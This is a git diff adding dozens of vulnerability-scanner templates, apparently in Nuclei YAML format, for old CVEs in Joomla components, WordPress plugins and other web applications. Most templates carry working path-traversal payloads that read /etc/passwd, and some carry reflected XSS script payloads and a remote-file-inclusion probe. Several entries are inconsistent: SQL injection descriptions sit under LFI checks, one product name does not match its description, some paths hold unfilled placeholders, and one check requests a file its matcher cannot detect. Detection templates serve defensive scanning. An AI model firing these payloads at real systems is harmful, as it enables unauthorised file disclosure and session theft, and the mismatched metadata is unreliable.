@@ -0,0 +1,27 @@ +id: CVE-2010-1873 + +info: + name: Joomla! Component Jvehicles - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. NOTE: some of these details are obtained from third party information. + reference: | + - https://www.exploit-db.com/exploits/11997 + - https://www.cvedetails.com/cve/CVE-2010-1873 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1878.yml b/cves/2010/CVE-2010-1878.yml new file mode 100644 index 0000000000..12459b34f7 --- /dev/null +++ b/cves/2010/CVE-2010-1878.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1878 + +info: + name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12317 + - https://www.cvedetails.com/cve/CVE-2010-1878 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1957.yml b/cves/2010/CVE-2010-1957.yml new file mode 100644 index 0000000000..63a50e8224 --- /dev/null 
+++ b/cves/2010/CVE-2010-1957.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1957 + +info: + name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12235 + - https://www.cvedetails.com/cve/CVE-2010-1957 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1977.yml b/cves/2010/CVE-2010-1977.yml new file mode 100644 index 0000000000..71de2a9492 --- /dev/null +++ b/cves/2010/CVE-2010-1977.yml @@ -0,0 +1,27 @@ +id: CVE-2010-1977 + +info: + name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12083 + - https://www.cvedetails.com/cve/CVE-2010-1977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-1982.yml b/cves/2010/CVE-2010-1982.yml new file mode 100644 index 0000000000..1ef0e13f14 --- /dev/null +++ b/cves/2010/CVE-2010-1982.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-1982 + +info: + name: Joomla! Component JA Voice 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12121 + - https://www.cvedetails.com/cve/CVE-2010-1982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2045.yml b/cves/2010/CVE-2010-2045.yml new file mode 100644 index 0000000000..886f48ac65 --- /dev/null +++ b/cves/2010/CVE-2010-2045.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2045 + +info: + name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12595 + - https://www.cvedetails.com/cve/CVE-2010-2045 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=[LFI]%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2050.yml b/cves/2010/CVE-2010-2050.yml new file mode 100644 index 0000000000..9aedcbfc20 --- /dev/null +++ b/cves/2010/CVE-2010-2050.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-2050 + +info: + name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12611 + - https://www.cvedetails.com/cve/CVE-2010-2050 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2128.yml b/cves/2010/CVE-2010-2128.yml new file mode 100644 index 0000000000..cf019f95a3 --- /dev/null +++ b/cves/2010/CVE-2010-2128.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2128 + +info: + name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12607 + - https://www.cvedetails.com/cve/CVE-2010-2128 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2507.yml b/cves/2010/CVE-2010-2507.yml new file mode 100644 index 0000000000..4ff7972b09 --- /dev/null 
+++ b/cves/2010/CVE-2010-2507.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2507 + +info: + name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/13981 + - https://www.cvedetails.com/cve/CVE-2010-2507 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2680.yml b/cves/2010/CVE-2010-2680.yml new file mode 100644 index 0000000000..6d1b76393a --- /dev/null +++ b/cves/2010/CVE-2010-2680.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2680 + +info: + name: Joomla! Component jesectionfinder - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/14064 + - https://www.cvedetails.com/cve/CVE-2010-2680 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=[LFI]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2010/CVE-2010-2857.yml b/cves/2010/CVE-2010-2857.yml new file mode 100644 index 0000000000..41f3443057 --- /dev/null +++ b/cves/2010/CVE-2010-2857.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2857 + +info: + name: Joomla! Component Music Manager - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. + reference: | + - https://www.exploit-db.com/exploits/14274 + - https://www.cvedetails.com/cve/CVE-2010-2857 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/component/music/album.html?cid=[LFI]%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-2918.yml b/cves/2010/CVE-2010-2918.yml new file mode 100644 index 0000000000..6585591609 --- /dev/null +++ b/cves/2010/CVE-2010-2918.yml @@ -0,0 +1,27 @@ +id: CVE-2010-2918 + +info: + name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion + author: daffainfo + severity: high + description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + reference: | + - https://www.exploit-db.com/exploits/31708 + - https://www.cvedetails.com/cve/CVE-2010-2918 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file 
diff --git a/cves/2010/CVE-2010-3203.yml b/cves/2010/CVE-2010-3203.yml new file mode 100644 index 0000000000..7f5245195e --- /dev/null +++ b/cves/2010/CVE-2010-3203.yml @@ -0,0 +1,27 @@ +id: CVE-2010-3203 + +info: + name: Joomla! Component PicSell 1.0 - Local File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php. + reference: | + - https://www.exploit-db.com/exploits/14845 + - https://www.cvedetails.com/cve/CVE-2010-3203 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4282.yml b/cves/2010/CVE-2010-4282.yml new file mode 100644 index 0000000000..6b4f52c658 --- /dev/null +++ b/cves/2010/CVE-2010-4282.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-4282 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + reference: | + - https://www.exploit-db.com/exploits/15643 + - https://www.cvedetails.com/cve/CVE-2010-4282 + tags: cve,cve2010,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4719.yml b/cves/2010/CVE-2010-4719.yml new file mode 100644 index 0000000000..1d50e72775 --- /dev/null +++ b/cves/2010/CVE-2010-4719.yml @@ -0,0 +1,27 @@ +id: CVE-2010-4719 + +info: + name: Joomla! Component JRadio - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/15749 + - https://www.cvedetails.com/cve/CVE-2010-4719 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jradio&controller=[LFI]%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4769.yml b/cves/2010/CVE-2010-4769.yml new file mode 100644 index 0000000000..84aebb4c15 
--- /dev/null +++ b/cves/2010/CVE-2010-4769.yml @@ -0,0 +1,27 @@ +id: CVE-2010-4769 + +info: + name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/15585 + - https://www.cvedetails.com/cve/CVE-2010-4769 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-4977.yml b/cves/2010/CVE-2010-4977.yml new file mode 100644 index 0000000000..455e53f70c --- /dev/null +++ b/cves/2010/CVE-2010-4977.yml @@ -0,0 +1,27 @@ +id: CVE-2010-4977 + +info: + name: Joomla! Component Canteen 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/34250 + - https://www.cvedetails.com/cve/CVE-2010-4977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-5028.yml b/cves/2010/CVE-2010-5028.yml new file mode 100644 index 0000000000..c5a262e530 --- /dev/null +++ b/cves/2010/CVE-2010-5028.yml 
@@ -0,0 +1,27 @@ +id: CVE-2010-5028 + +info: + name: Joomla! Component JE Job 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + reference: | + - https://www.exploit-db.com/exploits/12601 + - https://www.cvedetails.com/cve/CVE-2010-5028 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2010/CVE-2010-5286.yml b/cves/2010/CVE-2010-5286.yml new file mode 100644 index 0000000000..9657c736eb --- /dev/null +++ b/cves/2010/CVE-2010-5286.yml @@ -0,0 +1,27 @@ +id: CVE-2010-5286 + +info: + name: Joomla! Component Jstore - 'Controller' Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/34837 + - https://www.cvedetails.com/cve/CVE-2010-5286 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2011/CVE-2011-2744.yml b/cves/2011/CVE-2011-2744.yml new file mode 100644 index 0000000000..a31bf3374a --- /dev/null +++ b/cves/2011/CVE-2011-2744.yml 
@@ -0,0 +1,27 @@ +id: CVE-2011-2744 + +info: + name: Chyrp 2.x - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + reference: | + - https://www.exploit-db.com/exploits/35945 + - https://www.cvedetails.com/cve/CVE-2011-2744 + tags: cve,cve2011,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0981.yml b/cves/2012/CVE-2012-0981.yml new file mode 100644 index 0000000000..1fbd334ebd --- /dev/null +++ b/cves/2012/CVE-2012-0981.yml @@ -0,0 +1,27 @@ +id: CVE-2012-0981 + +info: + name: phpShowtime 2.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/18435 + - https://www.cvedetails.com/cve/CVE-2012-0981 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0996.yml b/cves/2012/CVE-2012-0996.yml new file mode 100644 index 0000000000..2b2b93c82d --- /dev/null +++ b/cves/2012/CVE-2012-0996.yml 
@@ -0,0 +1,27 @@ +id: CVE-2012-0996 + +info: + name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + reference: | + - https://www.exploit-db.com/exploits/36784 + - https://www.cvedetails.com/cve/CVE-2012-0996 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-1226.yml b/cves/2012/CVE-2012-1226.yml new file mode 100644 index 0000000000..1e6131bf81 --- /dev/null +++ b/cves/2012/CVE-2012-1226.yml @@ -0,0 +1,27 @@ +id: CVE-2012-1226 + +info: + name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + reference: | + - https://www.exploit-db.com/exploits/36873 + - https://www.cvedetails.com/cve/CVE-2012-1226 + tags: cve,cve2012,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-10037.yml b/cves/2014/CVE-2014-10037.yml new file mode 100644 index 0000000000..45138ab312 --- /dev/null +++ b/cves/2014/CVE-2014-10037.yml 
@@ -0,0 +1,27 @@ +id: CVE-2014-10037 + +info: + name: DomPHP 0.83 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. + reference: | + - https://www.exploit-db.com/exploits/30865 + - https://www.cvedetails.com/cve/CVE-2014-10037 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4539.yaml b/cves/2014/CVE-2014-4539.yaml new file mode 100644 index 0000000000..a6154b13b5 --- /dev/null +++ b/cves/2014/CVE-2014-4539.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4539 + +info: + name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4539 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4550.yaml b/cves/2014/CVE-2014-4550.yaml new file mode 100644 index 0000000000..50c6d4564c --- /dev/null +++ b/cves/2014/CVE-2014-4550.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2014-4550 + +info: + name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4558.yaml b/cves/2014/CVE-2014-4558.yaml new file mode 100644 index 0000000000..745d6d337e --- /dev/null +++ b/cves/2014/CVE-2014-4558.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4558 + +info: + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4561.yaml b/cves/2014/CVE-2014-4561.yaml new file mode 100644 index 0000000000..81ce56467b --- /dev/null +++ b/cves/2014/CVE-2014-4561.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2014-4561 + +info: + name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d + - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ultimate–weather–plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-4592.yaml b/cves/2014/CVE-2014-4592.yaml new file mode 100644 index 0000000000..6473d1c69d --- /dev/null +++ b/cves/2014/CVE-2014-4592.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4592 + +info: + name: WP Planet <= 0.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp–planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-5111.yml b/cves/2014/CVE-2014-5111.yml new file mode 100644 index 0000000000..f525a4441f --- /dev/null +++ b/cves/2014/CVE-2014-5111.yml 
@@ -0,0 +1,27 @@ +id: CVE-2014-5111 + +info: + name: Fonality trixbox - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/. + reference: | + - https://www.exploit-db.com/exploits/39351 + - https://www.cvedetails.com/cve/CVE-2014-5111 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2014/CVE-2014-5258.yml b/cves/2014/CVE-2014-5258.yml new file mode 100644 index 0000000000..3bbaec6a5e --- /dev/null +++ b/cves/2014/CVE-2014-5258.yml @@ -0,0 +1,27 @@ +id: CVE-2014-5258 + +info: + name: webEdition 6.3.8.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/34761 + - https://www.cvedetails.com/cve/CVE-2014-5258 + tags: cve,cve2014,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2015/CVE-2015-4414.yml b/cves/2015/CVE-2015-4414.yml new file mode 100644 index 0000000000..765e2d69dd --- /dev/null +++ b/cves/2015/CVE-2015-4414.yml 
@@ -0,0 +1,27 @@ +id: CVE-2015-4414 + +info: + name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: | + - https://www.exploit-db.com/exploits/37274 + - https://www.cvedetails.com/cve/CVE-2015-4414 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2015/CVE-2015-4632.yml b/cves/2015/CVE-2015-4632.yml new file mode 100644 index 0000000000..9c3123e887 --- /dev/null +++ b/cves/2015/CVE-2015-4632.yml 
